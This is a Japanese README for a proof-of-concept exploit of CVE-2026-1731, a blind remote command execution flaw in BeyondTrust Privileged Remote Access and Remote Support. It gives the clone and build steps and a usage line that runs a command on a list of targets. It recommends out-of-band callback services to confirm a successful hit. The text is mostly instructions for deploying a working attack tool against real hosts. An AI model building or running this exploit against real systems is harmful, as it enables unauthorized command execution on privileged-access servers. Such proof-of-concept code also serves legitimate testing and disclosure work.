
CVE-2026-1731の概念実証エクスプロイト。BeyondTrust Privileged Remote AccessおよびRemote SupportにおけるブラインドRCEであり、脆弱なバージョン上でリモートからのコマンド実行を可能にします。
詳細については、attackerkb.com による分析を読むことをお勧めします。
この PoC をビルドするには、以下のツールが必要です: Git、rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 バイナリが target/release に配置されますcd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
利用可能なオプションの一覧を表示するには、./CVE-2026-1731 -h を実行できます。
./CVE-2026-1731 --targets targets.txt --command "whoami"
注: CVE-2026-1731 はブラインド RCE であるため、脆弱性の指標として使用できる応答はホストから返されません。リクエストは成功する可能性がありますが、脆弱性のないターゲットでは RCE はトリガーされません。ターゲットに対するテストには、webhook.site や PortSwigger's Burp Collaborator などのサービスを使用することをお勧めします。この PoC の成功または失敗は、サーバーがステータスコード 200 で応答するかどうかに基づいています。
GET /get_rdf?comp=sdcust&locale_code=en-us エンドポイントを通じてバージョンチェックを追加する。